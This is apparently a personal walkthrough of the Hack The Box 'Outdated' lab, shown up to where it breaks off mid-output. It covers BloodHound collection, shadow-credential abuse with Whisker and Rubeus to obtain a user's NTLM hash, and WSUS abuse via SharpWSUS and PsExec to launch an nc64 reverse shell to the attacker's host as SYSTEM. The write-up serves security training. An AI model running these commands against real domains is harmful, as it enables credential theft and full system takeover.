hackthebox outdated windows medium

CONNECT between windows and linux

Bloodhound Collection

Grab the latest copy of SharpHound.exe from the Bloodhound repo,upload it to Outdated,working out of C:\programdata

iwr http://10.10.14.5:8888/SharpHound.exe -outfile s.exe
.\s.exe -C all
2022-07-19T20:34:56.1862643-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-07-19T20:34:56.1862643-07:00|INFORMATION|Initializing SharpHound at 8:34 PM on 7/19/2022
2022-07-19T20:34:56.6237628-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-07-19T20:34:56.8581431-07:00|INFORMATION|Beginning LDAP search for outdated.htb
2022-07-19T20:34:56.8895301-07:00|INFORMATION|Producer has finished, closing LDAP channel
2022-07-19T20:34:56.9050152-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2022-07-19T20:35:26.8931458-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 37 MB RAM
2022-07-19T20:35:45.2917806-07:00|INFORMATION|Consumers finished, closing output channel
2022-07-19T20:35:45.3386471-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2022-07-19T20:35:45.4948968-07:00|INFORMATION|Status: 97 objects finished (+97 2.020833)/s -- Using 59 MB RAM
2022-07-19T20:35:45.4948968-07:00|INFORMATION|Enumeration finished in 00:00:48.6515019
2022-07-19T20:35:45.6198986-07:00|INFORMATION|SharpHound Enumeration Completed at 8:35 PM on 7/19/2022! Happy Graphing!
PS C:\programdata> ls

    Directory: C:\programdata

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
...[snip]...
-a----         7/19/2022   8:35 PM          11477 20220719203544_BloodHound.zip
-a----         7/19/2022   8:35 PM           8753 MjdhMDc5MjItNDk4MS00NjFiLWFkY2ItZjQ0ZTBlODI3Mzhh.bin                 
-a----         7/19/2022   6:45 PM          45272 nc64.exe
-a----         7/19/2022   8:33 PM         908288 s.exe   

 

linux

impacket-smbserver -smb2support share . -username LM -password LM
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Windows

POWERSHELL
net use \\10.10.14.5\share /u:LM LM  #connect the smb
The command completed successfully
copy 20220719203544_BloodHound.zip \\10.10.14.5\share3

Shell as sflowers on DC

 Bloodhound Ananlysis

I’ll open Bloodhound, clear the database, and upload the Zip file. I’ll search for btables and mark them as owned. Looking closer at btables, they have one “Group Delegated Object Control” under “Outbound Control Rights”:

Clicking on that puts it on the graph:

 

As a member of the ITSTAFF group, btables has AddKeyCredentialLink on sflowers. Unfortunately, at the time of writing, there’s no abuse info in Bloodhound associated with that link.

 Get sflowers NTLM

Shadow credentials

We have a shell on the box,we can use Whisker to abuse.

Build Whisker

Git clone the Whisker.git and build it to exe file.I'll set the Build option to Release and Any CPU, and hit CTRL-Shift-B to build:

Copy the resulting Whisker.xe back to the kali

Exploit Shadow Credential

Our shell is as btables now.

Upload the Whisker.exe to Outdated using iwr

iwr http://10.10.14.5:8888/Whisker.exe -outfile whisker.exe

Run it to look for any current entries for sflowers 

Whisker.exe list /domain:outdated.htb /target:sflowers /dc:DC.outdated.htb
[*] Searching for the target account
[*] Target user found: CN=Susan Flowers,CN=Users,DC=outdated,DC=htb
[*] Listing deviced for sflowers:
[*] No entries!

Add one:

Whisker.exe add /domain:outdated.htb /target:sflowers /dc:DC.outdated.htb /password:lisenmiller
[*] No path was provided. The certificate will be printed as a Base64 blob [*] Searching for the target account [*] Target user found: CN=Susan Flowers,CN=Users,DC=outdated,DC=htb [*] Generating certificate [*] Certificate generated [*] Generating KeyCredential [*] KeyCredential generated with DeviceID 5cdd7103-25ea-444a-8a58-7dd254265116 [*] Updating the msDS-KeyCredentialLink attribute of the target object [+] Updated the msDS-KeyCredentialLink attribute of the target object [*] You can now run Rubeus with the following syntax: Rubeus.exe asktgt /user:sflowers /certificate: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 /password:"0xdf0xdf" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show

Upload the Rubeus.exe to box 

iwr http://10.10.14.5:8888/Rubeus.exe -outfile Rubeus.exe

Run the command that Whisker.exe suggest.

Rubeus.exe asktgt /user:sflowers
/password:"0xdf0xdf" /domain:outdated.htb /dc:DC.outdated.htb
/certificate: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
   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |                           
  |_|   |_|____/|____/|_____)____/(___/                            

  v2.0.3                                                           
                                                                   
[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=sflowers 
[*] Building AS-REQ (w/ PKINIT preauth) for: 'outdated.htb\sflowers'
[*] Using domain controller: 172.16.20.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      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

  ServiceName              :  krbtgt/outdated.htb
  ServiceRealm             :  OUTDATED.HTB
  UserName                 :  sflowers
  UserRealm                :  OUTDATED.HTB
  StartTime                :  7/19/2022 9:35:34 PM
  EndTime                  :  7/20/2022 7:35:34 AM
  RenewTill                :  7/26/2022 9:35:34 PM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  eS3rWh1yyu+COnBYg9XS8A==
  ASREP (key)              :  86CBEDAED5565CD4F39BE0D34BDCD874

[*] Getting credentials using U2U

  CredentialInfo         :
    Version              : 0
    EncryptionType       : rc4_hmac
    CredentialData       :
      CredentialCount    : 1
       NTLM              : 1FCDB1F6015DCB318CC77BB2BDA14DB5

As we can see the NTLM of user sflowers is shown.

We can using Evil-WINRM to login

evil-winrm -u sflowers -H hash -i dc.outdated.htb 

Sflowers is part of the Remote Management users users group ,as seen in Bloodhound.

Or as seen in the net user

net user sflowers /domain
The request will be processed at a domain controller for domain outdated.htb.

User name                    sflowers
Full Name                    Susan Flowers
Comment                      
User's comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            6/20/2022 11:04:09 AM
Password expires             Never
Password changeable          6/21/2022 11:04:09 AM
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   7/19/2022 9:35:34 PM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use*WSUS Administrators  
Global Group memberships     *Domain Users         
The command completed successfully.

Note the WSUS Administrator group.

So this box have WSUS server giving patches to the windows machine that upgrapes.

Shell as system

Enumeration

Googing for "enumerate exploit WSUS" provides a few good leads

Readers can learn the WSUS from my other article named WSUS instruction.

We can utiliz the tool called SharpWSUS.exe 

Upload the SharpWSUS.exe to box through Evil-winrm

*Evil-WinRM* PS C:\programdata> upload SharpWSUS.exe sw.exe
Info: Uploading SharpWSUS.exe to sw.exe

                                                             
Data: 65536 bytes of 65536 bytes copied

Info: Upload successful!

Identify WSUS server

From Client

PS C:\Get-itemproperty HKLM:\software\policies\microsoft\windows\WindowsUpdate

AcceptTrustedPublisherCerts                  : 1
ExcludeWUDriversInQualityUpdate              : 1
DoNotConnectToWindowsUpdateInternetLocations : 1
WUServer                                     : http://wsus.outdated.htb:8530
WUStatusServer                               : http://wsus.outdated.htb:8530
UpdateServiceUrlAlternate                    : 
PSPath                                       : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\policies
                                               \microsoft\windows\WindowsUpdate
PSParentPath                                 : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\policies
                                               \microsoft\windows
PSChildName                                  : WindowsUpdate
PSDrive                                      : HKLM
PSProvider                                   : Microsoft.PowerShell.Core\Registry

And from the DC:

*Evil-WinRM* PS C:\>get-itemproperty HKLM:\software\policies\microsoft\windows\Windowsupdate

SetActiveHours                               : 1
ActiveHoursStart                             : 0
ActiveHoursEnd                               : 23
AcceptTrustedPublisherCerts                  : 1
ExcludeWUDriversInQualityUpdate              : 1
DoNotConnectToWindowsUpdateInternetLocations : 1
WUServer                                     : http://wsus.outdated.htb:8530
WUStatusServer                               : http://wsus.outdated.htb:8530
UpdateServiceUrlAlternate                    :
PSPath                                       : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\policies\microsoft\windows\WindowsUpdate
PSParentPath                                 : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\policies\microsoft\windows
PSChildName                                  : WindowsUpdate
PSDrive                                      : HKLM
PSProvider                                   : Microsoft.PowerShell.Core\Registry

SharpWSUS.exe will do this as well

*Evil-WinRM* PS C:\programdata>  .\SharpWSUS.exe locate

 ____  _                   __        ______  _   _ ____
/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |
|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                       |_|
           Phil Keeble @ Nettitude Red Team

[*] Action: Locate WSUS Server
WSUS Server: http://wsus.outdated.htb:8530

[*] Locate complete

From client, ping will show that it’s the same host as the DC:

PS C:\> ping wsus.outdated.htb

Pinging dc.outdated.htb [172.16.20.1] with 32 bytes of data:
Reply from 172.16.20.1: bytes=32 time<1ms TTL=128
Reply from 172.16.20.1: bytes=32 time=2ms TTL=128
Reply from 172.16.20.1: bytes=32 time<1ms TTL=128
Reply from 172.16.20.1: bytes=32 time<1ms TTL=128

Ping statistics for 172.16.20.1:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 2ms, Average = 0ms

WSUS Information

SharpWSUS.exe will also give information about the clients using the WSUS:

*Evil-WinRM* PS C:\programdata> .\SharpWSUS.exe inspect

 ____  _                   __        ______  _   _ ____
/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |
|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                       |_|
           Phil Keeble @ Nettitude Red Team

[*] Action: Inspect WSUS Server

################# WSUS Server Enumeration via SQL ##################
ServerName, WSUSPortNumber, WSUSContentLocation
-----------------------------------------------
DC, 8530, c:\WSUS\WsusContent


####################### Computer Enumeration #######################
ComputerName, IPAddress, OSVersion, LastCheckInTime
---------------------------------------------------
dc.outdated.htb, 172.16.20.1, 10.0.17763.652, 7/22/2022 5:01:44 AM

####################### Downstream Server Enumeration #######################
ComputerName, OSVersion, LastCheckInTime
---------------------------------------------------

####################### Group Enumeration #######################
GroupName
---------------------------------------------------
All Computers
Downstream Servers
Unassigned Computers

[*] Inspect complete

It only shows the DC,but that's where want SYSTEM anyway.

Exploit

PsExec

WSUS will only run signed Microsoft binaries. As I have no good way to get a MS signing certificate, I’ll have to use something legit. The article suggests the Sysintenals tool, PSExec. I’ll download https://download.sysinternals.com/files/SysinternalsSuite.zip , copy PsExec.exe to my webserver, and upload it:

*Evil-WinRM* PS C:\programdata> upload PsExec64.exe \programdata\ps.exe
Info: Uploading PsExec64.exe to \programdata\ps.exe
                                                             
Data: 685960 bytes of 685960 bytes copied

Info: Upload successful!

I’ll create an update using SharpWSUS.exe. The blog post shows adding an administrator, but I’ll just go for a reverse shell using nc64.exe. The /args for PsExec are -accepteula so that it doesn’t pop a box and wait for a click, -s to run as system, and -d to return immediately. The /title is arbitrary.

.\SharpWSUS.exe create /payload:"C:\programdata\ps.exe" 
/args:" -accepteula -s -d c:\programdata\nc64.exe -e cmd.exe 10.10.14.5 445 "
/title:"CVE-2022-30190"
 ____  _                   __        ______  _   _ ____
/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |
|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                       |_|
           Phil Keeble @ Nettitude Red Team

[*] Action: Create Update
[*] Creating patch to use the following:
[*] Payload: ps.exe
[*] Payload Path: C:\programdata\ps.exe
[*] Arguments:  -accepteula -s -d c:\programdata\nc64.exe -e cmd.exe 10.10.14.6 445
[*] Arguments (HTML Encoded):  -accepteula -s -d c:\programdata\nc64.exe -e cmd.exe 10.10.14.6 445

################# WSUS Server Enumeration via SQL ##################
ServerName, WSUSPortNumber, WSUSContentLocation
-----------------------------------------------
DC, 8530, c:\WSUS\WsusContent

ImportUpdate
Update Revision ID: 44
PrepareXMLtoClient
InjectURL2Download
DeploymentRevision
PrepareBundle
PrepareBundle Revision ID: 45
PrepareXMLBundletoClient
DeploymentRevision

[*] Update created - When ready to deploy use the following command:
[*] SharpWSUS.exe approve /updateid:ea097920-0e17-4f9e-8045-0dfc5078a317 /computername:Target.FQDN /groupname:"Group Name"

[*] To check on the update status use the following command:
[*] SharpWSUS.exe check /updateid:ea097920-0e17-4f9e-8045-0dfc5078a317 /computername:Target.FQDN

[*] To delete the update use the following command:
